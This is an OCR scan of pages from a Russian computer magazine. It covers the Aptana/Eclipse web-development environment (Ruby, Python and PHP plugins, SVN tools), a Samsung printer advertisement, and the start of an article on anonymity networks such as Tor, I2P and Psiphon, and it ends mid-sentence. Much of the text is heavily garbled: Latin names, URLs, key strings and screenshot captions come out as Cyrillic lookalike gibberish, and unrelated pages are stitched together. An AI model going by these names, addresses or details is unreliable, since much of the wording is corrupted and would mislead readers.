специфический набор открытых окон и плагинов, сгруп- 
пированных под определенную задачу) и могут быть 
использованы с любой ЗОБ СУБД, для которой у тебя 
есть ЗОВС-драйвер. 

Облегчает работу (а также просто изучение новых 
средств] и встроенный каталог готовых примеров (па- 
нель За тріез], ну и набор некоторых готовых решений 
Зпірреіз, содержащий разные решения для С55, НТМБ и 
ЗаѵаЗсгірІ-кода. 

Следуя современным тенденциям, Аріапа стала первой 
средой разработки, где появилась встроенная поддержка 
платформы для АЗАХ-приложений АбоЬе АІР (она была до- 
ступной одной из первых, когда только о проекте объявили], 
а также дополнительные инструменты для работы с проек- 
тами, оптимизированными для Арріе іРбопе. В частности, 
при разработке страницты можешь сразу просмотреть, как 
они будут отображаться и исполняться на іРбопе, даже не 
имея его в наличии. 



С самой средой и клиентской частью мы вроде как разобра- 
лись, — все есть, все поддерживается и все отлично, а что 
же насчет поддержки серверных языков программирова- 
ния? 

Н РУБИН НА РЕЛЬСАХ, ИЛИ ІШВѴ0МКАІІ.5 

Сам язык Рыбу начал разрабатываться еще в 1 993 году, 
а первая версия вышла в 1995. Однако основную попу- 
лярность в вебе сыграл выпускв 2004 году фреймворка 
РиЬуОпРаіІз ( ѵѵѵѵѵѵ.гиЬѵопгаіІз.огд ]. позволяющего собрать 
готовые веб- приложен ия из заранее подготовленных заго- 
товок. Для комфортной разработки на Рубине-на-рельсах 
понадобится плагин, который является составной частью 
Аріапа Зіисііо и называется РасІРаіІз ( і рУ/ѵѵѵѵѵѵ. аріапа . 
сот/гаііз ). Он поддерживает, в отличие от конкурентов, 
все три реализации Рыбу — РиЬу, ЗРиЬу и РиЬіпіиз. Для 
настоящих хакеров в среду встроена полноценная отладка 
и профилирование кода (в версии Рго) и визуальные ре- 
дакторы со всеми наворотами для УМБ, РНТМБ/ЕРЬ, ХМБ. Я 
умолчу обо всех стандартных возможностях редактора кода 
(подсветка синтаксиса, анализатор кода на лету, подсказ- 
ки и автодополнение, тестер для регулярных выражений, 
«умное» автоформатирование кода, поддержка множества 
методов рефакторинга] — эти и другие мелочи в XXI веке уже 
стали стандартными для любой среды и платформы. Хотя 
вот коммерческий аналог РасІРаіІз — ЗгсШаіІ — не умеет ни 
анализировать код, ни его форматировать, а также не обла- 
дает функциональностью рефакторинга кода. Поддержка 
юнит-тестиро ван и я, автотестов и фреймворка РЗрес обес- 
печиттвоему коду максимальное качество (конечно, если 
не лениться и писать тесты]. Похоже, что РасІРаіІз среди 
открытых платформ — пока самая мощная и функциональ- 
ная, пригодная какдля начального освоения языка, таки 
профессиональной разработки ПО. 

Н ЯНДЕКС И ОООСБЕ ДРУЖАТ С РѴТНОМ 

Незря поисковые гиганты стольактивно используют для своих 
разработок именно Руібоп. Этотязык появился в 1990 году, 
намного раньше НиЬу, и сейчасзанимает серьезную позицию 
среди платформ для веб-разработки. И все благодаря своей 
мощности, гибкости, поддержке множества парадигм разра- 
ботки, развитой многопоточности. Использование крупными 
гигантами не остается незамеченным: программисты изтого 
жебоодіе выкладывают в репозитории огромное количество 
готовых модулей на все случаи жизни, избавляя коллег по 
ремеслу от необходимости изобретать велосипед. Кстати 
говоря, это официальный языкдля сервиса Соодіе Арр Епдіпе. 
Представители Яндекса также неоднократно заявляли, что 
используют Руібоп в некоторых своих проектах. 

Поддержка этого языка в Аріапа появилась совсем недав- 
но. В августе нынешнего года представители компании 




> Ііпкз 

По правильной 
идеологии МѴС с 
использованием 
модного языка РиЬу 
и самого продвину- 
того веб-фреймворка 
РиЬуОпРаіІз можно 
творить чудеса. ~і~ 
уже писал об этом 
языке и самой плат- 
форме. 

• «Искусство РиЬу 
№ 1 » : ѵѵѵѵѵѵ.хакер. 
ги/розі/33056/беІаиІБ 
азр . 

• «Вагон-ресто- 
ран»: біір У/ѵѵѵѵѵѵ. 
хакер.ги/тадагіпе/ 
хз/073/060/55.азр . 




> іггіо 

Для Есіірзе можно 
загрузить уже настро- 
енные дистрибутивы 
( Ыір ://ѵѵѵѵѵѵ. есіірзе . 
огд/сіоѵѵпіоабз ]. 
позволяющие начать 
разработку на Заѵа, 
Заѵа ЕЕ, С++, — или 
просто саму плат- 
форму с основными 
плагинами, поверх 
которой можно 
начать собирать 
собственную среду. 




> СІѴСІ 

На нашем ОѴБ ты 
найдешь необходи- 
мые средства веб- 
разработки. 
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Недаром ее называют одной из лучших сред для веб-кодера — тутесть 





заявили, что расширение РуОеѵ, ранее доступное как самостоятельный 
продукт, теперь будет включено в их среду. В дальнейшем разработчики 
будут трудиться как над полной интеграцией и поддержкой Руібоп.так 
и над улучшением проектов, где совмещается серверная сторона на 
питоне и клиентская на АЗАХ. 

Из ключевых особенностей редактора кода для Руібоп стоит отметить 
автодополнениетегов. Крометого, исправлена поддержка режима 
отладки и совместимость отладчика с ЗуіЬоп (реализация Руібоп’а на 
Цаѵа-платформе. ѵѵѵѵѵѵдѵіЬоп.огд ). интегрированный менеджер пакетов, 
поддержка Муіуп (впрочем, она имеется во всех расширениях для язы- 
ков в Аріапа). В помощь начинающим программистам будут пошаговые 
помощники для создания новых проектов, заявлена поддержка всех 
синтаксических конструкций версий 2.4 и 2.5 (именно поддержка 2.5 
считается одной из отличительных фич пакета), а также интерактивная 
консоль и другие средства, уже классические для редакторов кода. 
Русіеѵ, да и все остальные языковые плагины, ценны именно интег- 
рированностью в инфраструктуру Аріапа и полноценным отлад- 
чиком с унифицированным Есіі рве- интерфейсом. Это значит, что, 
разрабатывая проект на любом из языков, будь то клиентская часть 
на Э аѵа 5сгі рі: или серверная на РНР/ПиЬу/РуіЬоп, ты всегда будешь 
иметь дело с одинаковым стандартным интерфейсом и возможнос- 
тями. Конечно, будут и отличия, обусловленные особенностями язы- 
ка, но именно интегрированность в единый комплекс всех возмож- 
ностей превращает, казалось бы, стандартные редакторы и утилиты 
в единую среду, ЮЕ. К этому я бы добавил и сквозную поддержку 
общих модулей, например, Муіуп, представляющий собой единый 
интерфейс для управленияТобо-списками, ти кета ми и открытыми 
багами. Он позволяет подключаться прямо из среды кудаленным 
хранилищам кода, багтрекерам и другим источникам данных. А это, 
в свою очередь, еще более упрощает разработку и унифицирует 
рутинный труд. В дереве проекта отображаются и открытые тикеты, 
и незавершенные задачи, и данные с 5ѴІ\І-а — и другая полезная ин- 
формация. А стоит в комментарии пометить особым образом участок 
кода и указать, что он требует доработки, как эта метка автомати- 
чески перенесется в списокзадач и будет видна всем участникам 
проекта (которыхты наверняка позвал). 



Н А КАК ЖЕ ВСЕМИ ЛЮБИМЫЙ РНР? 

Ксожалению, а может и счастью, с РНР не все так радужно. Плагин для 
поддержки РНР в Аріапа появился нетакдавно и пока предоставляет 
только самые базовые возможности. Им можно пользоваться и вполне 
успешно, но на базе Есіірзе сейчас есть более продвинутые решения. 
Самым старым и заслуженным является пакет РНРЕсІірзе ( ѵѵѵѵѵѵ. 
рбресіірзе.пеі ). недавно обновившийся до версии 1.2.1. Па кет добавля- 
ет как расширенный редактор кода с автоматическим сворачиванием 
участков кода (Еоібіпд), так и автодополнение, автоподстановку пара- 
метров функций, возможности создавать собственные шаблоны кода 
для быстрой вставки одинаковых кусков. Но главное — это встроенные 




средства отладки, которые работают с двумя самыми популярными и 
мощными отладчиками для РНР — О ВС и ХбеЬид (2епсІ ЭеЬиддегне 
поддерживается). Вместе с РНРЕсІірзе удобно использовать внешний 
сервер для развертывания и отладки проекта в локальных условиях 

— он изначально настроен на поддержку среды ХАМРР и дополняет 
панель инструментов кнопками быстрого запуска и остановки сервера. 
Останется только настроить Аріапа на использование внешнего сервера 
при предпросмотре страниц и настроить профили отладки — и ты всегда 
одним кликом сможешь запустить свое приложение и отлаживать его, 
будьто баѵаЗсгірІ: или РНР, в одинаковом и стандартном интерфейсе 
среды Есіірзе. 

Отсутствие открытой среды для разработки под РНР на основе Есіірзе 
озаботило и компанию 2епб, которая выпускает коммерческие реше- 
ния для мира РНР. Поэтому она стала родоначальницей двух новых 
и претендующих на профессиональный рынок решений — открытой 
среды РОТ и собственной коммерческой, 2епб Эіисііо бог Есіірзе, 
которая пришла на смену платформе ХепсІ 5бисІ іо (там также поняли 
преимущество решения, основанного на платформе Есіірзе). И если 
платный вариант нам как-то не по душе (хотя он, без сомнения, имеет 
более широкие возможности в плане отладки кода), то РОТ — это 
«наше все». РОТ ( ѵѵѵѵѵѵ. есіірзе. огд/рсіі ) или РНР Оеѵеіортепі Тооіз 

— это плагин, реализующий все основные инструменты для работы с 
РНР-проектами в среде Есіірзе. 

К уже ставшим стандартными возможностям того же РН Р Есіірзе он 
добавляет еще и расширенную поддержку средств отладки (так как 
корни проекта с ХепсІ, то их фирменный отладчик поддерживается 
в чи сл е перв ых, а ХбеЬид появился лишь недавно). Также в среду 
входят собственные РНР- интерпретаторы последних версий, 
однако в следующем релизе будет и поддержка пока тестовых 
версий РНР 5.3 — наверное, чтобы разработчики уже готовились к 
обновлениям. 

0 УПРАВЛЕНИЕ ИСХОДНЫМ КОДОМ 

Сегодня разрабатывать что-либо и не использовать системы контро- 
ля версий — это почти что преступление. Ведьтак намного удобнее, 
безопаснее и, если тебе понадобится пригласить друга дописать вот 
здесь и здесь пару фич в вашем мега-проекте, то вы не станете конфлик- 
товать, внося изменения в один итотже файл. Поэтому использование 
современных систем контроля версий вроде СѴ5, БѴИ или Ѳіі является 
обязательным для любого веб-разработчика, претендующего на звание 
профессионала. И хотя в последнее время критика обычных систем 
стала нарастать и привела ксозданию новых средств, вроде распреде- 
ленных систем біі или Мегсигіаі, мы все же будем использовать старый 
добрый 5ѴІЧ. Он пока что удовлетворяет всем нашим нуждам. 



► 022 
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Как начать? 

Теория теорией, а все-таки нужно попрактиковаться и правиль- 
но все настроить. Не будем много говорить, просто рассмотрим 
несколько вариантов нашей среды. 

1 . Первый вариант — установить пакет Аршпа Зшсііо с сайта ѵуалплс 
арЕапа.сотЛшсІіо . Во время первого запуска нас спросят, нужна 
ли нам поддержка 5ѴЛ, и я советую согласиться и сразу установить 
этот плагин. Потом, после перезапуска среды, откроется окно 
МуАрИапа, где ты можешь увидеть установленные плагины и при 
необходимости дополнительно установить все необходимое. Среди 
списка плагинов можно выбрать поддержку тех АЭАХ-библиотек, 
которые будут использоваться, а также прямо оттуда установить 
Рубеѵ, КабКиЬу, РНР или даже все вместе. 

2. Есть и другой вариант: если ты любитель новенького и рас- 
считываешь в основном использовать РНР и АЭАХ. В этом случае 
сначала загрузи самую последнюю версию РЭТ (я имею в виду 
ветку 2.0, которая к моменту выхода журнала должна стать если и 
не релизом, то, по меньшей мере, КС) . При этом загружай сразу весь 
пакет со всеми зависимостями (РБТ-аП-іп-опе), иначе замучаешься 
доставлять пакеты и следить за совместимостью версий. Далее, 
после первого запуска, добавь адрес сайта с обновлениями Питр:// 
ирбаЕе. арііапа. сот/ирбаЕе /3 . 2 /роіісѵ.хті) . Хотя официально это и 
не заявлено, но Арііапа работает с Есіірзе вплоть до текущих сборок 
версии 3.5. РБТ 2.0 также будет работать на этой версии, правда, 
некоторые функции и обновления могут сообщать о несовмести- 
мости платформ. После этого зайди в меню обновления программ 
и установи базовый пакет Арііапа Зшсііо, а потом заинсталь нужные 
плагины. Важно сначала скачать Есіірзе в сборке под запуск РЭТ, а 
уже поверх установить Арагапа. Последним этапом будет установ- 
ка самостоятельной программы для работы с 5ѴЛ или активация 
встроенного плагина. 

Еще одно замечание. При установке бесплатной версии Арііапа 
Зшсііо ты получаешь триальный ключ для активации Рго-возмож- 
ностей. Это действительно может пригодиться, поэтому попробуй 
зайти в Неір -> Арііапа Ьісепзе и нажми там «ѵаіісі» для проверки 
ключа и потом «Іпзііаіі». После этого сможешь месяц наслаждаться 
расширенными функциями и окончательно решить, нужны они 
тебе или нет. А если хочешь еще сильнее расширить возможности 
среды, добавив, например, поддержку ІМЬ-моделирования или 
другие возможности — посмотри на проект Есіірзе Ріи§іп Сепітаі 
Гѵѵѵѵѵѵ.есіірзеріичіпсепіігаі.сот) . где ты найдешь тысячи плагинов на 
любой вкус. Разобравшись один раз с Есіірзе, ты сможешь собрать 
собственную рабочую среду под любую задачу! 




Арііапа ѴЗ. 

Арііапа Рго 

Для большинства программистов разница между бесплатной и про- 
фессиональной версией Арііапа несущественна, однако для некото- 
рых она может быть принципиальна. В частности, только в версии 
Рго есть поддержка развертывания проектов на удаленном сервере 
по протоколу 5ЕТР, а также «самое вкусное» — полностью интег- 
рированный в саму среду отладчик іаѵаЗсгіри для Іпнегпеі; Ехріогег! 
Да, это единственное такое решение на рынке, которое может 
полноценно использоваться для отладки под этот браузер любых 
АЭАХ- приложений. В обычную бесплатную редакцию входит такой 
же отладчик, но для МогШа ЕігеГох (там он не так нужен, если есть 
ЕігеЪи§) . Можно добавить еще визуальный редактор 35(Ж-данных, 
однако за несколько лет постоянной работы с бесплатной и Рго-вер- 
сиями Арііапа потребности в нем я так и не испытал. Среди других 
отличий Рго-версии стоит отметить встроенный Кероггіп^ Еп^іпе 
для составления отчетов по проекту (читай — красивых бумажек 
для менеджеров и заказчиков) ; возможность создавать проекты 
на основе удаленных хранилищ (5ЕТР, РТР, РТР5); продвинутый 
анализатор производительности для КиЬуОпКаіІз веб-приложений 
(КиЪу Регіогтапсе РгоШег) и ѴѴЗУІѴѴУС-редактор для конфигура- 
ционных ХМЬ-файлов при создании проектов на платформе АбоЪе 
АІК. Цена вопроса — $99. Стоят ли дополнительные возможности 
своих денег — решать тебе. 



Л юбаяуважающая себя среда разработки содержит встроенную поддерж- 
ку5ѴІ\І, или же имеет для этого плагин. Есіірзе/Аріапа — не исключение. 
Для Есіірзе естьдва плагина, которые обеспечивают работу с репозита- 
рием кода прямо в самой ЮЕ: это ЗиЬесІірзе и БиЬѵегзіѵе. Какой из них 
выбрать, по большому счету, нетакважно — весьбазовый функционал, 
нужный в 99% обычной работы, присутствует в обоих плагинах, поэтому 
ты можешьустановитьлюбой. Вместе с Арііапа теперь поставляется 
собственный плагин, и тебе вообще может не понадобиться что-либо 
устанавливать. Просто зайди в Ріидіп Мападег и нажми кнопку «Устано- 
вить» возле этого плагина (болеетого, при первом запуске тебе предло- 
жат автоматически установить поддержку 5ѴІ\І]. 

Но! По собственному опыту я могу рекомендовать... поставить отде- 
льную программу для работы с 5ѴІ\І на уровне файловой системы. 

Если у тебя ѴѴіп32-платформа, то лучшим выбором будет ТогТоізеБѴМ 
ЛогІюізезѵпТідгіз.огд ). Почему, спрашивается, не встроенные средства? 
Смотри, среда Есіірзе сама по себе достаточно громоздкая, и каждый 
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Многочисленные фишки для ПиЬу-кодера 



Конкуренты Есіірзе 

Какой бы ни была мощной среда Есіірзе, у нее сейчас много конку- 
рентов. И если раньше борьба шла в основном за рынок профессио- 
нальных разработчиков на баѵа или С/С + + , то теперь производите- 
ли играют на всех фронтах, пытаясь сформировать на основе своей 
среды универсальную систему для всех языков. Поэтому, если ты 
используешь скриптовые языки — РНР, Руі±юп, КиЪу или ЧаѵаЗсгірі:, 
то сможешь развернуть рабочее место с использованием почти всех 
«взрослых» ГОЕ. На днях вышла ЫегВеапз 6.5 в редакциях для отде- 
льных языков, включая РНР и КиЪу; доступны все основные функ- 
ции, включая отладку приложений. ІгЦеІІУ ГОЕА идет еще дальше, 
добавляя даже поддержку АсгіопЗсгірг/ЕІазІі/ЕІех (редактор кода, 
отладчик, дополнительные инструменты) . И даже на основе закры- 
той среды М5 Ѵізиаі Зшсііо можно попробовать сделать «конфетку» 
— взяв за основу бесплатные версии Ехргезз (Ѵізиаі ѴѴеЪ Беѵеіорег 
2008 Ехргезз Есіійоп), в которых, кстати, очень неплохой отладчик 
іаѵаЗсгірі; для ІЕ, а поддержка РНР добавляется дополнительно, 
пакетом Ѵ$. РНР ^ог Ѵізиаі ЗШсІіо 

Питр : / /ѵшѵ.і схзоЙѵѵаге . сот /ѵз . рЬр) . Единственное, что огор- 
чает — плагин платный. Однако, если очень нужно, это никого не 
остановит. 




ТогіоізеЗѴЫ встраивается сразу в систему и не зависит от конкретной 
среды разработки 



Обидный баг 

В Аргапа замечен один странный и просто неприятный глюк 
— иногда, когда ты открываешь среду для продолжения работы, или 
раскрываешь боковую панель, вкладка Ргоіесі, в которой отобра- 
жается дерево файлов и папок твоего проекта, обрезается и в нем 
отсутствует полоса прокрутки — ты не можешь добраться до корне- 
вой папки и что-либо сделать. Порой и перезагрузка не помогает. 

А решение простое — сначала закрой панель, а потом в меню вида 
просто снова включи панель проекта. 



раз ее за пуск будет отнимать много времени. А если ты все сделал, 
отправил изменения на сервер, закрыл и пошел пить пиво, а потом 
вспомнил, что не добавил новую иконку ктекущему проекту? Что делать 
— загружать многомегабайтного монстра ради того, чтобы послать один 
килобайтный файл? Сомнительное удовольствие. Зато, используя вне- 
шнюю программу, можно работать с репозитарием когда и какугодно, 
открывая только «Проводник» или файловый менеджер вроде Тоіаі 
Соттапбег. Не проблема сделать копию проекта в другой папке, или, 
например, вытащить один файл предыдущей версии, незатрагивая 
весь проект— все это можно делать независимо отосновной среды. 



Конечно, придется работать с несколькими программами сразу и 
добавлять/обновлять исходные коды проекта отдельно от среды 
разработки, но в случае небольших проектов выгоды такой 
работы более очевидны, чем сложности при внесении неболь- 
ших поправок. Ведь можно просто открыть блокнот и поправить 
строку-другую, если что-то не работает на сервере (ну, допустим, 
забыл поменять пароли для доступа кбазеданных — самая, 
кстати, частая ошибка при выкладке проектов с локального сер- 
вера на рабочий], не тратя еще минут пять на загрузку основного 
инструментария. ІНІ 
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цветной лазерный принтер 

$ат$ипд Сатта 




СІ-Р-315 



Гамма положительных эмоций в подарок! 

Представь... бесшумная работа с ярким результатом. Новая линейка цветных лазерных 
принтеров и многофункциональных устройств Патта* от Затзипд создана специально для 
тебя. Эти модели - самые компактные в своем классе и не занимают много места, 
а специально разработанные тонеры делают цветные отпечатки яркими и насыщенными. 




СІ-Х-3175 



Хочешь позитива? Прими участие в промоакции Затзипд «Ищи цвет». Купи цветной лазерный 
принтер или МФУ Затзипд СІ.Р-300, СІ_Р-300І\І, СІ_Р-310, СІ_Р-ЗШ, СІ_Р-315, СІ_Р-315ѴѴ, 
СІ_Х-2160, СЬХ-21 60И , СІ_Х-3170РІ\І, СІ_Х-3175, С1Х-3175И, С1Х-3175РИ и СІ_Х-3175РѴѴ 
и получи в подарок дизайнерскую футболку, разработанную специально для тебя! 



Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 



Галерея Затзипд: г. Москва, ул. Тверская, д. 9/17, стр. 1. ѵѵѵѵѵѵ.затзипд.сот. Товар сертифицирован. Реклама. 




АНДРЕЙ КОМАРОВ 

/ КОМАВОѴ@САМЕЬАЫО.РШ 



ЗАГРАНЬЮрщ 

НЕВИДИМОСТИ 



іКак сделать что-либо в Сети и сохранить анонимность? 



ос хороший 



!В стремлении остаться инкогнито приходится старательно маски 

— ■ — “ — 

(настоящий ІР-адрес и ши> 



овать 



Традиционных 



ѴРН-сое^^^^^^^^^линго^^бана^іьн^^^окси^невсещ^^^^это^о 
К счастью, сейчас появились новые решения, способные сделать 1еѵе1-ир^ 



твоей анонимности 



рс_гопе 



^ ПИРИНГОВЫЕ АНОНИМНЫЕ СЕТИ 

В чем проблема такого замечательного средства, какѴРЫ-сервис? На 
выходе получаешьсовершенно другой ІР, а весьтрафикдо сервера тща- 
тельно шифруется — сказка, да и только. Загвоздка в том, что ты все равно 
от кого-то зависишь. Нет никакой гарантии того, чтосервак, на котором уста- 
новлен ѴРІ\І или прокся, не ведетлоги, а в его подсети не орудует банальный 
снифер, который, как на десерт, уплетает весь расшифрованный трафик. 
Конечно, владельцы сервисовуверяют, что ихуслуги полностью безопасны 
и зачастую действительно прикладывают для этого массуусилий, ежене- 
дельно меняя ІР, а иногда даже и площадки размещения серверов. Но 100% 
гарантий -то все равно нет. Давай посмотрим на это со стороны. Раз один 
сервер обеспечитьанонимность не может, разумно попробовать перио- 
дически менять посредника — в этом случае отследить тебя будет гораздо 
сложнее. Таки родилась идея пиринговыханонимныхсетей. 

Вообще говоря, о подобной технологии, а именно — Тог, мыуже писали. 
Принцип обеспечения анонимности строится на базе распределенной 
системы серверов, так называемых нод, между которыми в зашифро- 
ванном виде передаются данные. Для соединения обычно используется 
три сервера, которые образуют временную цепочку. Серверы для нее 
выбираются случайным образом, причем каждый из них знает минимум 
информации о своих соседях. Однако Тог — это далеко не единственная 



разработка в этой области. Достигнуть широкой огласки ей помогли 
освещение в прессе и использование некогда в правительственных ор- 
ганизациях и военных ведомствах. В то же время добротные разработки 
пока не продвинулись дальше своего аккаунта в боодіе Сосіез (бесплат- 
ный сервис для разработчиков, где они могут хостить свои программы и 
исходники, — Прим. Біер’а). 

Основное предназначение пиринговых сетей состоитвтом, чтобы скрыть 
персону отправителя данных и их получателя. Иногда это делается даже 
в легальных целях (обмен информацией в кругу какого-то социального 
сообщества, типа «анонимных алкоголиков» и такдалее]. Но в целом 
многие эксперты выступают против таких сетей, потому что они увеличи- 
вают возможность оборота порнографии, нелегальных материалов и тому 
подобных вещей. Если рассматривать вопрос использованиятакихтех- 
нологий со стороны безопасности, можно сказать, что они актуальны при 
обходе цензурных фильтров, которые активно применяются в разных стра- 
нах (Китай, кпримеру]. Анонимные р2р-сети делятся на: ореппеі и багкпеі; 
(ІтіепсИо-ІтіепсІ) реализации. С этим все просто. В первомтипе сетей 
ноды выбираются автоматически или поуказанию клиента, во втором же 
— юзер уста на вливает соединение (сіігесі) только с определенным узлом, 
который он сам, наверняка, знает. Некоторые из технологий, кпримеру, 
Ргеепеі ( ѵууѵѵу.1теепеІ:рго]есЕогд ) поддерживаютобатипа соединения. 



► 026 



ХАКЕР 12 /120/ 08 





еѲ Ноѵѵ Тог ѴѴогк$: 3 



Тог ГЖІв 

. . + ипйлсгуріікілігік 
— * «пегуріогііілк 



щ ГгРаск Іп 5 Ед II аЕіоп оі і2р 



АНсе 



Біер 3: АІісе'а Тот сігепі 
рісКз а гапгіот раШ Іо 
гіеяііпаііоп звгѵег. Сгееп 
Ііпкб зге еп с гуріей* гей 
ІІпка. а го Іп Іііе сіенг. 



I ч 



ѵ„ 



Оаѵе 



иапс 



ВоЬ 




=№*} 



а Рій^^п Рс* [Ье ЗЬСтЕСіА?: 



ЙСССЙОПЙ 


* 


'1Т1ГГІГИІ 


Р)ф т Ѵ4.4.3 Рпг Ру№*п ѵг.5 




Злите іщЕёЯ Макет 5.02 




йлгЬир 


* 



сгеЭ&е ФЛШ* ГС* 

** СіЛТвПЕіКН' 

Г зІи«г5 



|Й5^"м^мдр 

Р СгеаЬе іЕюсЕсіе оп ЕЬе гіе*Еер 
ЁгГогос .сот/> 



Рг&ѵЮііі | |^О^ех^| 0ОиС | 



Подборочная картинка из официального мануала о функционировании 
сети ТОК. Из рисунка видно, зеленые пути — пути, где твой трафик шиф- 
эуется, красные — нет. Соответственно, если последняя выходная нода 
з близи сервера «ВОВ» будетпод управлением хакера, эфир персонажа 
Аіісе может быть прослушан. А ведь на ее месте мог оказать кто угодно! :] 



Устанавливаем і 



2 р 



іР РиТТУ (іпасУѵе) 



[19:34] 
[ 19:3 4] 
[19:35] 



гапз1ип> ок. , ■ 

@зкѵог> ие II соте а±беі: 10 шіГіз і бЬіпк 
гапз1ііп> ие 1 1 I тідЪб ыаіб :) 




[19:35] < каігеп> Ьгѣ ! ! ! 

[19:35] < гапз1ііп> сіереікіз ироп ту ігіеші апй ттЬеп Ье аггіѵез 
[19:35] < гапз1ип> :) 

[19:35] :Йз1гѵо-> :) 

[19:36] < гапзЬіш- зкѵог: Г-іче ргоЫет ^ібЬ ІТ із сЬаг пюзб реоріе бепсі бо іосиз 

опсо зопнебЬіпд 

[19:3 6] < гапзЬіп> 1 ѵе а АѴ/ГЫ/ІЕ5 ^те 1 ге заѵе 

[19:37] < гапзЬіп> Ъиб іп ±асб сЬеу сап 1 с Ье заѵе . ГОДз апсі со тау Ье 1 р , тлау Іод 
зотебЪіпд., гаііо сагез? : -) 

[19:37] < 2 апзЫп> зотебішез іб’з еешіег бо зітлріу баке бЬе рЬспе апсі саіі 
зотеЬосІу апгі бе 1 1 Гііт збогіез бо деб іпіоз : В 
[19:33] < гапзЫп> бЧіаб 1 з тлЬеге I бгизб Вгисе ЗсЬпеіес, зесигібу із а рггосезз 

Ъиб бЬапкз б о досі сомрапіез бепй бо ідпобе бѣаб 
[19:33] < гапзЬіп> :В 

[19:39] < бапзЬт> апугоау, I ъюпб зоипсі боо педабіѵе ;) 

[19:39] < гапзЬіп> Іібе із дгеабе,. зотеюіъеге еізе бог зоілеЬойу еізе :«Ф 

[19:59] < гапзЬіпк Ъуе 



[19:39] < гапзЫп> Іібе із дгеабе 

[19:59] < гапзЬіпк Ъуе 

[20:15] <Ѳз кѵог> уе і адгеее \ ) 

[2 3:08] [ *@зкѵог] [2 : ібгіеіепее] 

Г ібсіеіепсе] I 



5ІБС в действии. Международная хакерская беседа! Все, что для нее потребовалось — это иметь 55Н-клиент 



Н КОНКРЕТНЫЕ РЕАЛИЗАЦИИ 

Стоит отметить, что авторами подобного софта в основном 
являются немцы. Это легко объясняется суровостью их 
законодательства в отношении хакерства и разработки 
вредоносного кода. Один из моихдрузей в Германии со 
слезами на глазах рассказывал, что им запрещается даже 
держатьдома софтсуклоном втесты на проникновение 
или, не дай Бог, взлом (кроме случаев, когда ты предо- 
ставляешь та кие услуги на реальной основе]. В то же 
время орган, отвечающий за информационную безопас- 
ность страны — В5І, сам создал собственный ЫѵеСО для 
«безопасников», напичканный софтом типа ПоЬп-ТЬе- 
Кіррегит.п. Поэтомусреди населения крепнетжелание 
уклониться не только от выполнения упомянутых законов, 
но и, разумеется, ответственности за их несоблюдение. 
Остановившись на Германии, приведу в пример одну из 
самых известных децентрализованных анонимных сетей 
— І2Р ( і2р2.бе ). 

Сустановкой и настойкой проблем не возникнет — они 
предельно просты. Необходимо скачать клиент, требую- 
щий Иаѵа, и послезапуска он забиндит адрес Ьббр : // 



ІосаІЬозб : 7657, через которыйты и попадаешь в мир І2Р. 
Там ты обнаружишь нечто вроде реальной сети, со своими 
сервисами, приложениями, личным кабинетом, гдеты мо- 
жешь отслеживатьтрафик, а также мониторить новые ноды. 
Итак, основные приложения, доступные для использования 
внутри І2Р: 

• Зизішаіі (ІосаІТюзб :7657/зизішаі1/зизітаі1) 

• ЗизіБЫЗ (ІосаІЬозб : 7 657 /зизісіпз/іпсіех . з зр) 

• І2Рзпагк (ІосаІГюзб : 7657/і2рзпагк) 

• еерзібе ( ІосаІГюзб : 7658 ) 

• і2РТиппе1 ( ІосаІГюзб : 7657 /І2рбиппе1/іпсіех . 
Тзр) 

• мониторинг туннелей ( ІосаІГюзб : 7 657 / 
биппеіз . ] зр) 

Непосредственно анонимный серфинг в инете осуществля- 
ется посредством НТТР-прокси І2Р на 4444-порту. Кстати, в 
самой сети установлены защищенные веб-узлы, специаль- 
но заточенные для соблюдения анонимности и называемые 
«еерзііез». 



> іггіо 

• Подробности об 
использовании Тогты 
можешь прочитать в 
статье «Сетевой ка- 
муфляж» в #92 номе- 
ре тг или РОР-версии 
на нашем диске. 

• В статье освещены 
далеко не все сети 
для анонимизации. 
За кадром осталась, 
например, система 
РНАІМТОМ ( собе. 
доодіе.сот/р/ 
рбапіот ). Эта де- 
централизованная 
сеть появится после 
нового года. О том, 
что в ней ожидать, 
пока остается только 
догадываться. 




> ѵѵагпіпд 

Информация пред- 
ставлена в целях 
ознакомления. 

В случае использо- 
вания ее в проти- 
возаконных целях, 
за свои поступки ты 
будешь отвечать сам. 
Редакция в этом слу- 
чае ответственности 
не несет! 
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^ рс_гопе 




Ргіѵакз Кеу 

ЗеЬ7а5Ь6с2891 <14670731 е47б90240сЫе23Ьсеа36Ь47Г72Ы асШ 
Ь77Ыс325931 9аа[58а0а28525гі2Ь4<іЗЬ8е1 басібаОІ 21 а5Ы 7335сс 
5Ь61 1 8гіШе4ГЫ ее364221 433^8620821 е477а4е41 8635е3021 037 
Ш71 а493БЬ9сНЪ6е4с2сОа0741 91 агі0Эе<Ю57(2928а64864333аЬЗ 
ОаЭЭ39443с2с97704а225с23ГЬ064Ь706с^ 

РиЫіс Кеу 

ЬВЗЬсІ 8Ье8Ы8231 1 асіМ47ее70[452050аЭ5П 71 6566еЭ01 Ш аб 
8е1 1 9Ы61 8с^95261 5а8с8Ь6772с[Э08с77е1 сі 9Ье28еП 4Ыв1 а 
3445с(ЫЗ[2[ЭЬ74б644ГЬеЬ4Ь8аШ8с341 7бс28Ъ2Ьбе4184ес1 2Н21 
Ь4Ь5е6бб55972Ы[7е8аа98ЬЬ28Ь60056е04525еаЗааеа787419Ь31 



| іоИпбое. нЬаьёѵёг пе* 



|Открытый и секретные ключиі 



гюбе/геіау Іуре 
<* ЫзегЛгапзіеггі [по геіау] 
С ршаіе гЫау 
Г риЬйс геіау 



сііеггі ассезз 
** ІосаІНокЦІ 27. 0.0.11 
Г апу [0.0. 0.0] 

С оіЬег 

оГЬег іп*егРасе абсіге&з: 



ПеІзузеШпдз | 



деіЬпд побеге! Ьу ІІР (апопутоиз) 

I* АиЮтабсІу деі побе.геР кгііеп соппесііпд шіОі а сііепі. 



деИіпд побеге! Ьу НИР (по! апопутоиз) 
Асгіотабсіу деі побеге! оп $1аг!іпд ІІР. 

БЫ побеге! поѵѵ 



^Установленный Апопутоиз ІВС в действии» 



ІІР - Квіау §еШп&5 



г ОБХОДИМ ФИЛЬТРЫ 

Еще одна интересная разработка в этой области — проект РзірЬоп 
( зірЬоп.са ). Цель разработчиков — предоставить возможность беспре- 
пятственного доступа в инет гражданам тех стран, где это серьезно огра- 
ничивается. В большинстве стран никаких ограничений и фильтров нет, 
но есть целый ряд государств, имеющий свой взгляд на свободу в Сети. 
Общая идея проекта РзірЬоп заключается в том, что пользователи, про- 
